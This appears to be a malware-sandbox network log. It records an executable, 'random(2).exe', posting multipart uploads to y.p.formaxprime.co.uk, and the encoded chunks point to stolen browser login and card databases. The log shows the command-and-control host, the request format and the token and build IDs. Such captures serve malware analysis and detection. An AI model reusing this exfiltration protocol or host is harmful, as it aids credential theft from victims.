                                                                                                                                          2025-03-19 13:02:16 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                          2025-03-19 13:02:16 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                          2025-03-19 13:02:16 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                          2025-03-19 13:02:16 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                          2025-03-19 13:02:16 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                          2025-03-19 13:02:18 UTC158INHTTP/1.1 200 OK
                                                                                                                                          Server: nginx
                                                                                                                                          Date: Wed, 19 Mar 2025 13:02:18 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          9192.168.2.104970178.47.63.1324436980C:\Users\user\Desktop\random(2).exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-03-19 13:02:17 UTC273OUTPOST / HTTP/1.1
                                                                                                                                          Content-Type: multipart/form-data; boundary=----y5fctr1d2dtrqqimgvas
                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0
                                                                                                                                          Host: y.p.formaxprime.co.uk
                                                                                                                                          Content-Length: 55081
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2025-03-19 13:02:17 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 79 35 66 63 74 72 31 64 32 64 74 72 71 71 69 6d 67 76 61 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 64 62 39 34 61 64 38 38 35 34 63 34 62 34 62 34 38 63 37 63 38 65 34 66 36 62 62 33 36 38 38 0d 0a 2d 2d 2d 2d 2d 2d 79 35 66 63 74 72 31 64 32 64 74 72 71 71 69 6d 67 76 61 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 30 36 32 31 61 66 34 39 34 37 66 36 66 37 38 30 30 38 36 35 61 35 63 38 30 64 38 66 33 32 39 0d 0a 2d 2d 2d 2d 2d 2d 79 35 66 63 74 72 31 64 32 64 74 72 71 71 69 6d 67 76 61 73 0d 0a 43 6f 6e 74
                                                                                                                                          Data Ascii: ------y5fctr1d2dtrqqimgvasContent-Disposition: form-data; name="token"5db94ad8854c4b4b48c7c8e4f6bb3688------y5fctr1d2dtrqqimgvasContent-Disposition: form-data; name="build_id"80621af4947f6f7800865a5c80d8f329------y5fctr1d2dtrqqimgvasCont
                                                                                                                                          2025-03-19 13:02:17 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                          2025-03-19 13:02:17 UTC16355OUTData Raw: 43 42 4a 54 6c 52 46 52 30 56 53 4c 43 42 7a 61 47 46 79 61 57 35 6e 58 32 35 76 64 47 6c 6d 61 57 4e 68 64 47 6c 76 62 6c 39 6b 61 58 4e 77 62 47 46 35 5a 57 51 67 53 55 35 55 52 55 64 46 55 69 42 4f 54 31 51 67 54 6c 56 4d 54 43 42 45 52 55 5a 42 56 55 78 55 49 44 41 73 49 47 74 6c 65 57 4e 6f 59 57 6c 75 58 32 6c 6b 5a 57 35 30 61 57 5a 70 5a 58 49 67 51 6b 78 50 51 69 77 67 63 32 56 75 5a 47 56 79 58 33 42 79 62 32 5a 70 62 47 56 66 61 57 31 68 5a 32 56 66 64 58 4a 73 49 46 5a 42 55 6b 4e 49 51 56 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b
                                                                                                                                          Data Ascii: CBJTlRFR0VSLCBzaGFyaW5nX25vdGlmaWNhdGlvbl9kaXNwbGF5ZWQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIGtleWNoYWluX2lkZW50aWZpZXIgQkxPQiwgc2VuZGVyX3Byb2ZpbGVfaW1hZ2VfdXJsIFZBUkNIQVIsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3Jk
                                                                                                                                          2025-03-19 13:02:17 UTC6016OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                          2025-03-19 13:02:18 UTC158INHTTP/1.1 200 OK
                                                                                                                                          Server: nginx
                                                                                                                                          Date: Wed, 19 Mar 2025 13:02:18 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          2025-03-19 13:02:18 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          10192.168.2.104970278.47.63.1324436980C:\Users\user\Desktop\random(2).exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-03-19 13:02:19 UTC274OUTPOST / HTTP/1.1
                                                                                                                                          Content-Type: multipart/form-data; boundary=----7g4eukfkxlnyu3wl6pzu
                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0
                                                                                                                                          Host: y.p.formaxprime.co.uk
                                                                                                                                          Content-Length: 186149
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2025-03-19 13:02:19 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 37 67 34 65 75 6b 66 6b 78 6c 6e 79 75 33 77 6c 36 70 7a 75 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 64 62 39 34 61 64 38 38 35 34 63 34 62 34 62 34 38 63 37 63 38 65 34 66 36 62 62 33 36 38 38 0d 0a 2d 2d 2d 2d 2d 2d 37 67 34 65 75 6b 66 6b 78 6c 6e 79 75 33 77 6c 36 70 7a 75 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 30 36 32 31 61 66 34 39 34 37 66 36 66 37 38 30 30 38 36 35 61 35 63 38 30 64 38 66 33 32 39 0d 0a 2d 2d 2d 2d 2d 2d 37 67 34 65 75 6b 66 6b 78 6c 6e 79 75 33 77 6c 36 70 7a 75 0d 0a 43 6f 6e 74
                                                                                                                                          Data Ascii: ------7g4eukfkxlnyu3wl6pzuContent-Disposition: form-data; name="token"5db94ad8854c4b4b48c7c8e4f6bb3688------7g4eukfkxlnyu3wl6pzuContent-Disposition: form-data; name="build_id"80621af4947f6f7800865a5c80d8f329------7g4eukfkxlnyu3wl6pzuCont
                                                                                                                                          2025-03-19 13:02:19 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                          2025-03-19 13:02:19 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                          2025-03-19 13:02:19 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                          2025-03-19 13:02:19 UTC16355OUTData Raw: 66 64 47 56 34 64 43 42 57 51 56 4a 44 53 45 46 53 4c 43 42 31 63 32 46 6e 5a 56 39 70 62 6e 4e 30 63 6e 56 6a 64 47 6c 76 62 6e 4e 66 64 47 56 34 64 43 42 57 51 56 4a 44 53 45 46 53 4b 59 46 30 47 41 63 58 52 55 55 42 67 6d 74 30 59 57 4a 73 5a 58 4e 6c 63 6e 5a 6c 63 6c 39 6a 59 58 4a 6b 58 32 4e 73 62 33 56 6b 58 33 52 76 61 32 56 75 58 32 52 68 64 47 46 7a 5a 58 4a 32 5a 58 4a 66 59 32 46 79 5a 46 39 6a 62 47 39 31 5a 46 39 30 62 32 74 6c 62 6c 39 6b 59 58 52 68 48 45 4e 53 52 55 46 55 52 53 42 55 51 55 4a 4d 52 53 42 7a 5a 58 4a 32 5a 58 4a 66 59 32 46 79 5a 46 39 6a 62 47 39 31 5a 46 39 30 62 32 74 6c 62 6c 39 6b 59 58 52 68 49 43 68 70 5a 43 42 57 51 56 4a 44 53 45 46 53 4c 43 42 7a 64 57 5a 6d 61 58 67 67 56 6b 46 53 51 30 68 42 55 69 77 67 5a 58
                                                                                                                                          Data Ascii: fdGV4dCBWQVJDSEFSLCB1c2FnZV9pbnN0cnVjdGlvbnNfdGV4dCBWQVJDSEFSKYF0GAcXRUUBgmt0YWJsZXNlcnZlcl9jYXJkX2Nsb3VkX3Rva2VuX2RhdGFzZXJ2ZXJfY2FyZF9jbG91ZF90b2tlbl9kYXRhHENSRUFURSBUQUJMRSBzZXJ2ZXJfY2FyZF9jbG91ZF90b2tlbl9kYXRhIChpZCBWQVJDSEFSLCBzdWZmaXggVkFSQ0hBUiwgZX
                                                                                                                                          2025-03-19 13:02:19 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                          2025-03-19 13:02:19 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                          2025-03-19 13:02:19 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
